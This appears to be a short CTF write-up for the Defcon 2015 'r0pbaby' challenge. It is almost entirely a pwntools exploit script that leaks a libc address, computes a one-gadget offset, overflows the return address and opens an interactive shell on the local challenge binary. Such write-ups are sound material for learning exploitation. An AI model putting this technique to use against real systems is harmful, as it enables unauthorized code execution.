
Defcon CTF 2015 r0pbaby

JeonYoungSin 2019. 7. 28. 22:13

exploit.py


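from pwn import *

# Byte literals are used for every send/receive below so the script runs under
# both Python 2 and Python 3 pwntools: on Python 3 the tube works in bytes and
# p64() returns bytes, so the original ``'A' * 8 + p64(...)`` raises TypeError.

p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc  # the libc pwntools resolves for the local binary

# Offsets into that libc build. They are only meaningful for the exact libc
# the author ran against; recompute them for any other build.
pop_rdi_offset = 0x000000000002155f  # not referenced below; kept from the original
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]  # candidate offsets; only the first is used

# Option 2 is expected to print the runtime address of the named symbol;
# the address is parsed as hex from the third space-separated token of the reply.
p.sendlineafter(b': ', b'2')
p.sendlineafter(b': ', b'gets')
gets_addr = int(p.recvline().split(b' ')[2], 16)

# Leaked address minus the symbol's offset gives the base of the loaded libc.
libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

# 8 bytes of padding followed by the computed address.
payload = b'A' * 8
payload += p64(one_addr)

# Option 3 asks for a length and then the data; the length is sent as
# len(payload) + 1, exactly as in the original script.
p.sendlineafter(b': ', b'3')
p.sendlineafter(b': ', str(len(payload) + 1).encode())
p.sendline(payload)

# Option 4 appears to leave the menu loop; the session is then handed to the user.
p.sendlineafter(b': ', b'4')
p.interactive()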